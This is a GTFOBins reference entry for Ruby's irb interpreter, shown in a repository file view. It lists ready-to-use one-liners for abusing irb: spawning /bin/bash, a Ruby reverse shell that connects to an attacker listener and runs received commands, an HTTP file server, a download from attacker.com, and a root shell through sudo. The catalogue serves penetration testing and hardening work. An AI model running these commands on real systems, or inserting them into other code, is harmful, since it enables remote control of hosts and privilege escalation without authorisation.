Files
GTFOBins.github.io/_gtfobins/irb.md
Shaksham Jaiswal 1cbe81b195 Add irb (#44)
2019-01-03 20:17:38 +00:00

1005 B

functions
functions
shell reverse-shell file-upload file-download sudo
code
irb exec '/bin/bash'
description code
Run `nc -lvp RPORT` on the attacker box to receive the shell. export RHOST='127.0.0.1' export RPORT=9000 irb require 'socket'; exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read} end
description code
Serve files in the local folder running an HTTP server on port 8080. irb require 'webrick'; WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start;
description code
Fetch a remote file via an HTTP GET request and store it in `PWD`. export URL=http://attacker.com/file_to_get export FILE=file_to_save irb require 'open-uri'; download = open(ENV['URL']); IO.copy_stream(download, ENV['FILE'])
code
sudo irb exec '/bin/bash'